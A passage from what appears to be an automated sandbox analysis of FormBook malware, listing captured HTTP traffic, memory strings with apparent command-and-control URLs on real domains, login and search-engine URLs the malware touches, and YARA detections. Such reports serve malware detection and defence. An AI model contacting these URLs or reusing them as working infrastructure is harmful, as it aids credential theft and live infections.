d0 e0 e2 36 a1 45 e4 de ba 7b 0d 3d 42 9a cb 67 14 9a e6 99 84 8d 63 86 3d 79 0d 45 8b 9a 27 f1 a7 6a 7c c8 30 c3 8a 36 72 38 49 47 73 b8 72 12 27 b9 7a 12 08 2b da e9 be ff ac 2e 3e f4 98 61 56 97 64 be a6 f4 81 bf e8 c1 47 e2 a3 b5 f2 35 54 74 a7 7c 71 79 96 3f 49 2f d1 c7 74 1e de 25 85 b0 ad 43 ba 5e 39 f4 05 a6 48 d5 0a 0d 4f 8b 7f 73 12 cf 84 c2 be 96 fa b5 80 aa eb da 3e fa e7 19 31 f9 35 47 2a b6 0f 1f 7a 34 35 d2 a9 a0 42 19 0e 4a cf 80 ea c5 06 4f c7 36 8f 9a a7 63 db 75 d1 d3 b1 53 ac 7b 3a 0a c6 da a7 a3 48 65 e6 5a 2d 00 fd ea db cb 81 de 5f f1 f2 0a f5 da b6 93 7f 2f 19 05 bb 09 91 0e 74 7c e8 e6 e6 fa f6 Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 11 Sep 2024 20:06:15 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 11 Sep 2024 20:06:18 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 11 Sep 2024 20:06:20 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 11 Sep 2024 20:06:23 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
            Source: SecEdit.exe, 0000000C.00000002.3793502568.00000000047D6000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000004176000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.000000000399C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ1
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.000000000380A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/
            Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3795206841.0000000005411000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cr-pos.com
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3795206841.0000000005411000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cr-pos.com/o1v8/
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033yu1SPS
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: SecEdit.exe, 0000000C.00000003.1778792851.0000000007907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003B46000.00000004.10000000.00040000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3795835777.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.00000000034E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001FF56000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=goodgiftguru.com
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003B46000.00000004.10000000.00040000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3795835777.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.00000000034E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001FF56000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
